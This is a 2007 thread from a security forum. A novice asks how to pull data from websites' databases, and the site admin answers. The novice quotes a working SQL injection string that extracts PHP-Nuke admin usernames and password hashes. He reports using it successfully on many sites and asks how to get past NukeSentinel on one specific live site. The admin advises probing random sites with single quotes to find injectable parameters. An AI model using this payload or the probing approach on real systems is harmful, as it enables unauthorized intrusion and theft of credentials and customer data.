Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 75
Members: 0
Total: 75
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Perhaps, too much information shown?
Post new topicReply to topic View previous topic :: View next topic
Perhaps, too much information shown?
PostPosted: Fri Aug 31, 2007 4:43 am Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Hey all!
I have a snippet of code here that I would like you to take a look at:
Code:

<form method="post" name="login" action="checklogin.php">
<td> <div align="center">

<input name="ws_user" type="text" class="form_username" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10">
<input name="pwd" type="password" class="form_password" onFocus="this.className='form_on'" onBlur="this.className='form_off'" size="10">
<br>
<input type="submit" name="Submit" value="Submit">
</div></td>
</form>


It was taken from a website login box. I am almost positive the site is NOT PHPNUKE. To me, it looks like there is alot of information that maybe "shouldn't" be here, meaning that an attacker has alot of information here to get past this little login.

Also, what type of code can I type into the URL to do a search on the database (with the above code). I am learning php, but like everyone, we all have questions!

I have been tinkering around on hackthissite.org and I seem to understand a good amount, and get through some of the missions(I have completed all of the basic, and starting on the 2nd "realistic" mission), so with that knowledge, I came up with an idea of what might work, if I am wrong, let me know!

Here is an example I came up with:
Code:

somewebsite.com/index.php?WHERE "something=something" AND "something=something


Please forgive my noobiness. We all gotta start somewhere.
View user's profile Send private message
PostPosted: Fri Aug 31, 2007 9:37 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Your first example is common login form and has nothing wrong itself.
But if we do search on Google against "ws_user", then we will find something like this:

http://cms.webspell.org/index.php?site=demo

Comparing login forms we can see close resemblance - so it can be WebSpell CMS.
And next, looking for exploits for WebSpell:

http://www.securityfocus.com/archive/1/archive/1/460937/100/0/threaded

Your second example - what are You trying to say?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Aug 31, 2007 4:34 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




I have done some searching in your forums and I was wondering if there was a way to query the database, either by the URL bar or by the search engine that is intergrated within a website.

For my ecample:
Code:

somewebsite.com/index.php?WHERE "something=something" AND "something=something


Is there a way to impliment code like this to bring back such information from the websites database?
I have used your:
Code:

p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

with some nice success rates (however on many sites, it sends me right back to the main (index.php) right after I submit the search.

I am looking for something perhaps around the same lines.

Idea: Is there anything about using the forum search to get information from the database (usernames,hash,pwds,etc..)

Side note: I have tested many of the examples on the forums in PHPNUKE sites (many versions) and if I input a ` in the login box,it sends me to a blank page that says "begone" on it. Why is that?

Thanks alot!
View user's profile Send private message
PostPosted: Fri Aug 31, 2007 4:56 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




First - this "begone" messages is the result of some anti-sql-injection code in phpnuke scripts. It is meant to be used for making sql injection attacks and xss abuse more difficult and it works as expected.

Now - that "exploit line", you are using, is written specially for phpnuke.
If you want to attack other targets besides phpnuke-powered, then you can always make your own working "exploit strings".

One more thing - you must understand, that sql injection is security hole and programming bug or "feature" and if programmer was good and wrote php code carefully, then you just cant steal any information from database or make other db manipulations.
But if website is written unsecurely or webserver has "magic_quotes=off" and programmer expected "=on", then there are lots of possibilities - stealing admin passwords, customer data from e-shops, etc, etc.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Aug 31, 2007 5:15 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Thank you for your information about the "begone" message.

As for the "exploit line", I only use it for PHPNUKE, There are certain sites that do ban me for a "UNION ATTACK", and I am trying to find a way to change the code a bit so that will not happen, but no luck yet.

How do I go about checking if a webserver has "magic_quotes" on or off?

Currently I am interested in PHPNUKE sites only.
1 site in particular, it is PHPNUKE Platinum version 7.6.b.4
with NukeSentinel version 2.4.2pl1

Links, ideas, and information would be greatly helpful.
View user's profile Send private message
PostPosted: Fri Aug 31, 2007 5:47 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You have encountered "Sentinel" - powerful protection system for phpnuke. It is often very hard to bypass that anti-hacking system. And if someone finds the way, then Sentinel will be updated soon and evasion problem stays.

Now, about "magic_quotes=off". My suggestion - surf the web and try to insert ("inject") single quotes to various URI parameters. If you will see sql-related error messages, then you are in right direction.

Some random examples:

http://www.hot.ee/http123/sql01.png

http://www.hot.ee/http123/sql02.png

See ya Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Aug 31, 2007 6:07 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Thank you very much! It is all making more sense to me.

I am going to install that PHPNUKE PLAT version and nuke sentinal on a remote computer for testing. If I find anything or if you have any ideas do not hesitate to PM me or reply to this post.

I will check this post often and like always, browse the forum for more information.

Thanks again!
View user's profile Send private message
Perhaps, too much information shown?
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds